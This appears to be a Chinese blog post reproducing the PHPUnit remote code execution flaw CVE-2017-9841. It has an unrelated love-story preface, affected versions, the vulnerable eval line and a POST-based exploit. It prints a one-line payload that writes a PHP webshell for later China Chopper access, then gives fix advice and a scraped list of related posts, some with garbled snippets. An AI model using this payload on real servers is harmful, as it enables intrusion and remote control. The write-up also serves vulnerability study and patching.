phpunit 远程代码执行漏洞(CVE-2017-9841)复现
phpunit 远程代码执行漏洞(CVE-2017-9841)复现
上海虹桥机场有这么一个故事,一对恋人在机场分手,女对男说“你别等我了,我们不会有结果,就像机场永远等不来火车,我们以后也不会有交集”。没过几年,虹桥机场跟火车站连在了一起,设计这个工程的总工程师就是那个男的,只要有爱就有办法,任何人都可以无止境的对一个人好,但是前提是值得。
漏洞概述:
- PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。
漏洞版本:
- 4.8.19 ~ 4.8.27
- 5.0.10 ~ 5.6.2
基本原理:
漏洞位于/phpunit/src/Util/PHP/eval-stdin.php。
eval('?>'.file_get_contents('php://input'));
漏洞复现:
- 总体来说就是向
vendor/phpunit/src/Util/PHP/eval-stdin.php
发送POST请求执行php代码。 - 例如直接执行phpinfo
- 也可以直接写入一句话木马。
<?=file_put_contents("1.php", '<?=eval($_REQUEST[1]);?>');
成功生成,即可菜刀连接。
漏洞修复:
果断一点,生产环境中直接删掉phpunit,没有用。
如果不想删,念旧情,直接升级吧,
懒打升级?那就直接设置权限,禁止访问该目录。
余生很长,请多指教。
phpunit 远程代码执行漏洞(CVE-2017-9841)复现相关推荐
- php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
- F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现
一.在vmware上安装BIGIP-15.1.0 进入F5官方主页:https://support.f5.com/csp/home 点击下载按钮(如下图所示) 进入页面后,我们选择v15.X版本 选择 ...
- Weblogic远程代码执行漏洞(CVE-2023-21839)复现/保姆级讲解
目录 引言 产品简介 漏洞描述 影响范围 漏洞复现 环境搭建 JDK安装: Weblogic安装: 漏洞利用 漏OracleOracle 引言 本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔 ...
- SMB v1远程代码执行漏洞(CVE-2020-1301)复现
0x00影响版本 参考:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301 0x01漏洞分 ...
- CVE-2021-1675: Windows Print Spooler远程代码执行漏洞
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...
- 【安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第二次更新...
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 近日,奇安信CERT监测到Spring Framework存在远程代码执行漏洞(CVE-2022-22965),在 ...
- CVE-2018-8174 IE浏览器远程代码执行漏洞
0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...
- Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 Splunk Enterprise是机器数据的引擎.使用Splunk可收集.索引和利用所有应用程序.服务器和设备生 ...
- [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
最新文章
- 网络推广——网络推广专员如何分析网站关键词排名波动影响因素
- 动态调整canvas时的问题
- Git的基本概念/常用命令及实例
- bzoj3550: [ONTAK2010]Vacation1283: 序列
- php 流量,PHP 流量控制语句的顶替语法
- KMP算法 AC自动机
- 智能优化算法应用:基于灰狼算法的二维Otsu图像阈值分割-附代码
- 编程珠玑续版-chp2 关联数组-awk
- cobar mysql_阿里开源Mysql分布式中间件:Cobar
- 邮件中的抄送和密送的区别
- 部分女生爱搭配蕾丝的服饰
- 于丹《庄子》心得讲稿-《大道与自然》
- 10秒钟搞定圆柱齿轮设计所有课题
- 笔记本计算机的连接无线网络连接,笔记本电脑连接wifi的方法步骤
- linux写makefile用tab报错,隐含规则 - linux makefile教程
- 数据库substr……in……
- 这 6 个开源项目很 Cool
- 【MySQL】测试题02
- 图文翻页-兼容IE8和Chrome浏览器
- 第七届青年地学论坛女科学家论坛学习